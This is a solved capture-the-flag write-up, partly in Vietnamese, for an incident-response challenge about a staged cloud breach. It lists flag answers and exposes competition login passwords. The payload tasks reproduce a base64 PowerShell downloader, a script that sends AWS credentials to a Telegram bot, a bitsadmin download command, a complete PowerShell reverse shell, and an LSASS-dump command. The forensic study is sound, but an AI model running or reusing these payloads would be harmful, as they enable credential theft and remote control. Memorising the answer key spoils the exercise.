# Hunters Games 2025
Welcome to the Hunters Games 2025! You have been provisioned access to the Hunters and Snowflake platforms. You will need them to solve the challenges. For a brief UI tutorial, please go to the competition landing page here and scroll down. For support, join the join the competition Discord server at https://discord.gg/SnzsWrzDvU or email thehuntersgames@hunters.ai
>Click [here](https://app.hunters.ai/account/login) to access the Hunter platform. Your username is ctf_user+218@hunters.security and your password is i_2C.eHg9CyF!CUfpauY
>Click [here](https://qwb42871.snowflakecomputing.com/console) to access the Snowflake UI. Your username is ctf_user218 and your password is 3M!*YNKuHdA.pmx!d2gF
---
## ✅Task 0 - Get Started
What began as a seemingly ordinary day at Dunder Mifflin took a sharp turn when IT noticed a spike in suspicious behavior across the company’s cloud infrastructure. Within hours, unexpected activity began surfacing in critical services, and by the time IT escalated the issue, some of the company’s production environment had already been wiped.
That’s when corporate called you in.
You are part of the elite Incident Response Team, tasked with investigating this sophisticated cyber attack spanning multiple cloud services. Your toolkit is the Hunters platform and access to logs stored in Snowflake. Your mission is to trace the attacker’s footsteps, uncover the scope of the breach, and determine exactly how deep the compromise goes, before more damage is done.
Let's start easy, how many leads were created in Hunters over the past 60 days?
> Một ngày tưởng chừng như bình thường tại Dunder Mifflin đã rẽ sang một hướng hoàn toàn khác khi bộ phận CNTT nhận thấy sự gia tăng đột biến các hành vi đáng ngờ trên toàn bộ cơ sở hạ tầng đám mây của công ty. Chỉ trong vài giờ, các hoạt động bất ngờ bắt đầu xuất hiện trong các dịch vụ quan trọng, và khi bộ phận CNTT báo cáo sự cố, một số dữ liệu trong môi trường sản xuất của công ty đã bị xóa sạch.
>
> Đó là lúc công ty gọi bạn đến.
>
> Bạn là thành viên của Đội Ứng phó Sự cố tinh nhuệ, được giao nhiệm vụ điều tra cuộc tấn công mạng tinh vi này trên nhiều dịch vụ đám mây. Bộ công cụ của bạn là nền tảng Hunters và quyền truy cập vào nhật ký được lưu trữ trong Snowflake. Nhiệm vụ của bạn là lần theo dấu vết của kẻ tấn công, khám phá phạm vi vi phạm và xác định chính xác mức độ nghiêm trọng của vụ xâm nhập, trước khi thiệt hại trở nên nghiêm trọng hơn.
>
> Hãy bắt đầu một cách đơn giản, có bao nhiêu đầu mối đã được tạo ra trên Hunters trong 60 ngày qua?
> Flag: 1,209
---
## ✅Task 1 - Attack Story
As you delve into the logs and trace the steps of the attacker, A user reported receiving a suspicious message on Teams,
What is the overall score of the attack story correlating activity with Microsoft Teams?
Navigate to the Stories page under Threat Hunting section in Hunters and switch to Bookmark to see all the bookmarked stories
> Khi bạn xem xét kỹ nhật ký và theo dõi các bước của kẻ tấn công, một người dùng đã báo cáo nhận được tin nhắn đáng ngờ trên Teams,
>
> Điểm tổng thể của câu chuyện tấn công liên quan đến hoạt động với Microsoft Teams là bao nhiêu?
>
> Điều hướng đến trang Câu chuyện trong mục Săn Đe Dọa trong Hunters và chuyển sang mục Đánh dấu để xem tất cả các câu chuyện đã được đánh dấu.
> Flag: 357
---
## ✅Task 2 - Suspicious Message
A user reported receiving a message that appeared to come from internal IT. Upon closer inspection, the sender's address raised some red flags.
What was the Email address used by the attacker?
> Một người dùng báo cáo đã nhận được một tin nhắn dường như đến từ bộ phận CNTT nội bộ. Khi kiểm tra kỹ hơn, địa chỉ người gửi có một số dấu hiệu đáng ngờ.
>
> Kẻ tấn công đã sử dụng địa chỉ email nào?
> Flag: HelpDesk@officeit.onmicrosoft.com
---
## ✅Task 3 - Suspicious Message 2
Continuing your investigation into the attack in Hunters, you analyze the logs to determine the extent of the attacker's phishing activity.
How many messages did the attacker send during the conversation?
> Tiếp tục điều tra về vụ tấn công trong Hunters, bạn phân tích nhật ký để xác định mức độ hoạt động lừa đảo của kẻ tấn công.
>
> Kẻ tấn công đã gửi bao nhiêu tin nhắn trong suốt cuộc trò chuyện?
> Flag: 729
---
## ✅Task 4 - Suspicious Message 3
What URL did the attacker send that was used to initiate the compromise?
> Kẻ tấn công đã gửi URL nào được sử dụng để bắt đầu xâm phạm?
> FLag: https://drive.google.com/file/d/1jPXKHYbiOOz7pvZXyR2xxrNuQx60Dny4/view?usp=sharing
---
## ✅Task 5 - Compromised Host
An alert indicates of suspicious activities on an endpoint in Hunters was found. Your task is to identify critical details about the compromised host.
What is the hostname of the initially compromised host?
> Một cảnh báo cho biết có hoạt động đáng ngờ trên một điểm cuối trong Hunters đã được phát hiện. Nhiệm vụ của bạn là xác định các chi tiết quan trọng về máy chủ bị xâm nhập.
>
> Tên máy chủ của máy chủ bị xâm nhập ban đầu là gì?
> FLAG: MICHAEL-SCOTT-P
---
## ✅Task 6 - RMM Tool
The attacker manipulated the user into establishing a connection back to their infrastructure, giving them remote access to the machine.
What is the domain name of the instance the attacker used to host the session?
> Kẻ tấn công đã thao túng người dùng thiết lập kết nối trở lại cơ sở hạ tầng của họ, cho phép họ truy cập từ xa vào máy.
>
> Tên miền của phiên bản mà kẻ tấn công đã sử dụng để lưu trữ phiên là gì?
> Flag: node182329.dwservice.net
---
## ✅Task 7 - Malicious Payload
Upon further investigation, you discover that a malicious payload was executed by the attacker.
What is the process UID of the process that initially executed the payload?
> Sau khi điều tra thêm, bạn phát hiện ra rằng kẻ tấn công đã thực thi một payload độc hại.
>
> UID của tiến trình thực thi payload ban đầu là gì?
> Flag: 23362585139
---
## ✅Task 8 - Payload Origin
As you investigate the payload, you uncover an obfuscated command, By reversing the obfuscation, you can trace the origin of the payload.
What is the full URL from which the payload was downloaded?
> Khi bạn điều tra payload, bạn phát hiện ra một lệnh bị che giấu. Bằng cách đảo ngược lệnh bị che giấu, bạn có thể truy tìm nguồn gốc của payload.
>
> URL đầy đủ mà payload được tải xuống là gì?
```
LgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACIASQAiACwAIgBFAFgAIgApACAAKAAmACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAIgBOAGUAdwAiACwAIgB0ACIALAAiAC0ATwBiAGoAZQBjACIAKQAgACgAIgB7ADEAfQB7ADAAfQB7ADM
AfQB7ADIAfQAiACAALQBmACAAIgBDAGwAaQBlACIALAAiAE4AZQB0AC4AVwBlAGIAIgAsACIAdAAiACwAIgBuACIAKQApAC4AKAAiAHsAMQB9AHsAMwB9AHsAMAB9AHsAMgB9ACIALQBmACIAZABTAHQAIgAsACIARABvAHcAbgBsACIALAAiAHIAaQBuAG
cAIgAsACIAbwBhACIAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsAOAB9AHsAMQB9AHsAMQA1AH0AewA1AH0AewAxADMAfQB7ADAAfQB7ADEAOAB9AHsANgB9AHsANwB9AHsAMQA2AH0AewA5AH0AewAzAH0AewAxADQAfQB7ADQAfQB7ADIAfQB7ADEAMAB9A
HsAMQAxAH0AewAxADcAfQB7ADEAMgB9ACIAIAAtAGYAIgBiACIALAAiAHQAdABwAHMAOgAvAC8AcgAiACwAIgBoAGUAYQBkAHMALwBtAGEAaQBuAC8AIgAsACIAZQBJACIALAAiAG8AbwBsAHMALwByAGUAZgBzAC8AIgAsACIAdwAuAGcAaQAiACwAIgBl
AHIAYwBvAG4AdABlAG4AIgAsACIAdAAuAGMAbwBtAC8AIgAsACIAaAAiACwAIgBPAGYAZgBpAGMAIgAsACIAYQB1AHQAIgAsACIAbwBfAHAAIgAsACIAMQAiACwAIgB0AGgAdQAiACwAIgBUAC8AVAAiACwAIgBhACIALAAiAFQAaABlACIALAAiAGEAdAB
jAGgALgBwAHMAIgAsACIAdQBzACIAKQApAA==
```
> Flag: https://raw.githubusercontent.com/TheOfficeIT/Tools/refs/heads/main/auto_patch.ps1
---
## ✅Task 9 - Payload Analysis
Your analysis of the obfuscated payload reveals it pulls a second malicious payload from an external source. Upon execution, the payload begins interacting with local resources.
What is the name of the file that the payload attempts to read?
>Phân tích của bạn về payload bị che giấu cho thấy nó kéo một payload độc hại thứ hai từ một nguồn bên ngoài. Sau khi thực thi, payload bắt đầu tương tác với các tài nguyên cục bộ.
Tên tệp mà payload cố gắng đọc là gì?
```bat=
$wzy = "59";$tt = "58";$hes = "38";$123 = "37";$x4 = "10";$ty = ":";$gg = "AA";$ls = "GV";$hf = "Sw";$whoami = "vG";$whoareu = "fI";$potat = "RF";$xaxa = "YH";$yel = "Mq";$ydidu = "E0";$lol = "5x";$brb = "lC";$afk = "NI";$xor = "xz";$2s = "C-";$sha420 = "5O";$base58 = "Rp";$pythagoras = "Bo";$charles = "I"
$temp = $wzy + $tt + $hes + $123 + $x4 + $ty + $gg + $ls + $hf + $whoami + $whoareu + $potat + $xaxa + $yel + $ydidu + $lol + $brb + $afk + $xor + $2s + $sha420 + $base58 + $pythagoras + $charles
$__ox = "604"
$__cx = "972"
$__fx = "174"
$nsa842jf2 = $__cx + $__fx + $__ox
$__path_frag = ".aws\credentials"
$w26zxa842 = Get-Content (Join-Path $env:USERPROFILE $__path_frag) -Raw
$__tapi = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String("aHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdA=="))
$24t8veb = $__tapi + $temp + "/sendMessage"
Invoke-RestMethod -Uri $24t8veb -Method Post -Body @{ chat_id = $nsa842jf2; text = $w26zxa842 }
```
Payload này xác định biến
```powershell
$__path_frag = ".aws\credentials"
```
và sau đó chạy
```powershell
Get-Content (Join-Path $env:USERPROFILE $__path_frag) -Raw
```
\=> Như vậy, file mà payload cố gắng đọc là:
> Flag: %USERPROFILE%.aws\credentials
(tức file `credentials` trong thư mục `.aws` của người dùng)
---
## ✅Task 10 - Payload Analysis 2
What is the full domain the payload sends its request to?
Tiếp tục từ trong payload trước. aHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdA==
> Flag: https://api.telegram.org/bot
---
## ✅Task 10.5 - Payload Analysis 3
What is the secret token used in the payload?
Token bí mật được “giấu” trong dòng nối chuỗi khởi tạo biến `$temp`. Cụ thể, ở đây:
```powershell
# Khởi tạo các phần của token
$wzy = "59"; $tt = "58"; $hes = "38"; $123 = "37";
$x4 = "10"; $ty = ":"; $gg = "AA"; $ls = "GV";
$hf = "Sw"; $whoami = "vG"; $whoareu= "fI"; $potat = "RF";
$xaxa = "YH"; $yel = "Mq"; $ydidu = "E0"; $lol = "5x";
$brb = "lC"; $afk = "NI"; $xor = "xz"; $2s = "C-";
$sha420= "5O"; $base58 = "Rp"; $pythagoras="Bo"; $charles="I"
# Dòng này nối toàn bộ thành token bot Telegram
$temp = $wzy + $tt + $hes + $123 + $x4 + $ty +
$gg + $ls + $hf + $whoami + $whoareu + $potat +
$xaxa + $yel + $ydidu + $lol + $brb + $afk +
$xor + $2s + $sha420 + $base58 + $pythagoras + $charles
```
Kết quả của `$temp` chính là chuỗi:
```
5958383710:AAGVSwvGfIRFYHMqE05xlCNIxzC-5ORpBoI
```
Đồng thời, biến này được dùng để xây dựng URL gửi tin nhắn:
```powershell
$__tapi = "https://api.telegram.org/bot"
$send_uri = $__tapi + $temp + "/sendMessage"
```
Nơi `$temp` chứa đúng secret token.
> FLag: 5958383710:AAGVSwvGfIRFYHMqE05xlCNIxzC-5ORpBoI
---
## ✅Task 11 - Persistence Technique
To maintain access to the compromised device, the attacker established a method of persistence
What process did the attacker use to implement persistence?
> https://www.packetlabs.net/posts/a-deep-dive-into-persistence-techniques-used-in-cyberattacks/
> Flag: bitsadmin.exe
---
## ✅Task 12 - Persistence Identification
What is the name for the job that was created?
```powershell=
"C:\Windows\system32\bitsadmin.exe" /addfile AdobeUpdaterTask http://updates.adobe.com/flash/psrt3.dll C:\temp\upd.dll
```
phần ngay sau tham số /addfile là tên Job được tạo:
> Flag: AdobeUpdaterTask
---
## ✅Task 13 - Reverse Shell Origins
The investigation reveals a reverse shell was initiated during the attack.
What is the attacker IP used for persistence?
```
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMgAwAC4ANwAuADEANwAzAC4AMQAyADIAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
```
```powershell=
$client = New-Object System.Net.Sockets.TCPClient("20.7.173.122",9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
> Flag: 20.7.173.122
---
## ✅Task 14 - Privilege Escalation
In their attack, the attacker exploited a specific DLL on a remote machine.
What is the DLL name abused by the attacker on the remote machine?
> Flag: comsvcs.dll
---
## ✅Task 15 - Privilege Escalation 2
During their privilege escalation phase, the attacker executed a known Windows DLL with a crafted argument: #+0000^24
What function was invoked as a result of this execution?
`rundll32.exe C:\Windows\System32\comsvcs.dll #+000024 " 728 text.dmp full"`
> https://lolbas-project.github.io/lolbas/Libraries/comsvcs/
> 
Khi chạy:
```powershell
rundll32.exe C:\Windows\System32\comsvcs.dll #+000024 "728 text.dmp full"
```
Thuật toán thực chất là:
1. `rundll32.exe` nhận tham số đầu tiên sau đường dẫn DLL là ordinal export, ở đây là `#24`.
2. Trong `comsvcs.dll`, export thứ 24 (ordinal 24) là hàm **MiniDump** – hàm này gọi tiếp `MiniDumpWriteDump` để tạo file dump của tiến trình mục tiêu (ví dụ LSASS). ([Gist][1], [lolbas-project.github.io][2])
3. Tham số `"728 text.dmp full"` được truyền vào hàm `MiniDump`, gồm PID (`728`), đường dẫn output (`text.dmp`) và chế độ dump (`full`).
Tóm lại, `#+0000^24` hay `#24` đều chỉ cách gọi hàm export theo ordinal, và ordinal 24 trong `comsvcs.dll` chính là **MiniDump**. Vì vậy payload đã invoke thành công hàm này để dump bộ nhớ tiến trình.
[1]: https://gist.github.com/JohnLaTwC/3e7dd4cd8520467df179e93fb44a434e?utm_source=chatgpt.com "comsvcs MiniDump examples"
[2]: https://lolbas-project.github.io/lolbas/Libraries/comsvcs/?utm_source=chatgpt.com "Comsvcs | LOLBAS"
> Flag: MiniDump
---
## ✅Task 16 - Credentials Dump
As part of their tactics, the attacker dumped credentials to a specific file on the system.
What is the file name of the file that contains the dumped credentials?
Từ lệnh câu 15 ta có thể đoán được luôn là tệp nào.
> Flag: text.dmp
---
## ✅Task 17 - Enumeration
After gaining access, the attacker began searching through the compromised machine for valuable information, Several files stood out as likely targets during this enumeration phase, all pointing toward credential harvesting.
Name one of the files the attacker accessed during his enumeration.
> Flag: db_passwords.lnk
---
## ✅Task 18 - Lateral Movement
As the investigation progressed, traces of suspicious activity extended beyond the on-prem environment and into the organization’s cloud infrastructure. Evidence suggests the attacker used previously stolen credentials to gain initial access to AWS.
Which ARN was compromised and used by the attacker to access the AWS environment?
> Flag: arn:aws:iam::588101796321:user/michael_scott
---
## ✅Task 19 - AWS Compromise
What is the ID of the AWS access key that was compromised?
> Flag: AKIAYR3MZIHQ3RFG7LRY
---
## ✅Task 20 - Initial Commands
Upon gaining access to AWS, the attacker issued a series of commands.
What is the 2nd command executed by the attacker?
> Flag: GetAccountSummary
---
## ✅Task 21 - AWS Sign-in
With access to AWS API keys, the attacker’s next move was to transition into a console session, giving them interactive access to cloud resources. This requires calling a specific API to obtain temporary credentials suitable for login.
Which AWS API call enabled the attacker to generate a token for console access
> Flag: GetFederationToken
---
## ✅Task 22 - AWS Sign-in 2
Following the creation of a federation token, a access key was generated and used in the activity.
What is the ID of the AWS access key that was used for the console login?
> Flag: ASIAYR3MZIHQZN4LQCMP
---
## ✅Task 23 - AWS Sign-in 3
The attacker left behind a small clue about the system they were using
What is the operating system version used by the attacker?
---
## ✅Task 24- Persistence
In order to maintain access to the environment without drawing attention, the attacker made a specific AWS API call that granted them a persistent identity
What AWS API call did the attacker use to establish persistence in the environment?
Để xác định đúng API call kẻ tấn công dùng để “cấy” một identity có tính persistent, ta không tìm CreateAccessKey (đó chỉ là hậu quả) mà phải nhìn xem họ đã tạo cái gì mới trong IAM. Thông thường đó là:
`CreateUser`
> https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateUser.html
> Flag: CreateUser
---
## ✅Task 25 - Persistence 2
What is the ID of the access key issued as part of this suspicious action?
> Flag: AIDAYR3MZIHQ6ZIHWQAAR
---
## ✅Task 26 - Persistence 3
Name one of the IAM policies attached to this access key?
> Flag: arn:aws:iam::aws:policy/SecretsManagerReadWrite
---
## ✅Task 27 - Secret Exfiltration
As part of his attack, the attacker exfiltrated production secrets .
What is the 2nd secret name accessed by the attacker?
> Flag: arn:aws:secretsmanager:eu-central-1:588101796321:secret:dunder_production_2
---
## ✅Task 28 - Lateral Movement
After enumerating the AWS environment, the attacker decided to connect to an EC2 instance.
What is the Instance ID of the instance the attacker accessed?
Search (ikon kính lúp).
Data type: chỉ tick aws-cloudtrail.
Event class: chọn API Activity.
> Flag: i-057b9e5dbbad18a06
---
## ✅Task 28.5 - Machine Identification
After enumerating the AWS environment, the attacker decided to connect to an EC2 instance.
What is the EDR Agent ID of the instance?
> Flag: 61a702bec07c429b97a8d80f3eec7189
---
## ✅Task 29 - Command Execution (
After identifying the Instance that was used by the attacker. You continued with the investigation, trying to identify commands executed on the machine.
Can you specify the EDR Target process ID of the process executed by the attacker?
> Flag: 65581976079
---
## ✅Task 30 - Dead End
Your investigation into the deletion of production infrastructure in Azure has reached a dead end. The only remaining lead is a suspicious instance previously accessed by the attacker. While reviewing activity from that host, you uncover a set of requests targeting a different cloud resources.
What is the third resource the attacker made a request to?
> Flag: https://graph.microsoft.com/
---
## ✅Task 31 - Dead End 2
In reviewing activity from a compromised cloud-connected instance, you uncover a set of requests that target internal metadata endpoints.
What technique was used by the attacker? Provide the full name of the first contributor listed under this technique in MITRE ATT&CK
> https://attack.mitre.org/techniques/T1528/
Khi ta xem lại loạt request nhắm vào Azure Instance Metadata Service (IMDS) để lấy token, đó chính là hành vi trong kỹ thuật **Steal Application Access Token (T1528)** của MITRE ATT\&CK, vì kẻ tấn công “steal” (lấy cắp) token thông qua IMDS ([MITRE ATT\&CK][1]).
Trên trang MITRE ATT\&CK dành cho T1528, phần **“Contributors”** liệt kê những cá nhân và tổ chức đã đóng góp định nghĩa cho kỹ thuật này. Người đầu tiên được nêu tên chính là **Alon Klayman** ([MITRE ATT\&CK][1]).
[1]: https://attack.mitre.org/techniques/T1528/ "Steal Application Access Token, Technique T1528 - Enterprise | MITRE ATT&CK®"
> Flag: Alon Klayman
---
## ✅Task 32 - Dead End 3
Based on the name of the accessed resource, you understand that this machine has a special configuration enabling it to act as a bridge between environments.
What is the feature name that is enabled on this instance that allows it?
> Flag: Azure Arc Resource Bridge
---
## ✅Task 33 - Azure Initial Access
You dig through Azure sign-in data to validate the suspicious activity. The events linked to this identity are stored in a distinct log category designed for a specific type of authentication flow.
What is the log category name where the sign-in activity of this identity appears?
> Flag: ManagedIdentitySignInLogs
---
## ✅Task 33 - Azure Initial Access
Your investigation reveals a cloud identity was used to gain initial access to the Azure environment.
What is the resource principal ID of the compromised identity?
> Flag: f185b5ac-c369-42ab-808f-97e0b40cccfe
---
## ✅Task 34 - Azure Initial Access 3
During your investigation, you come across a suspicious sign-in attributed to the Identity. However, something about the event seems off, there’s a critical piece of metadata missing.
What is the IP Address used by the attacker to sign in to the resources?
> Flag: 52.136.29.3
---
## ✅Task 35 - Attack on Azure
What is the name of the second machine that was affected by the compromised identity?
> Flag: printing-service-prod-2
---
## ✅Task 36 - Attacker Identity
You’ve identified the attacker’s external payload source, attackers often leave behind artifacts. A closer look at where the malicious script is hosted may reveal more about who's behind it.
Can you uncover the attacker’s original email address?
Câu này thì ta suy ra từ câu 4
> Flag: charlesminerr@gmail.com
---
Sign in with Wallet
Connect another wallet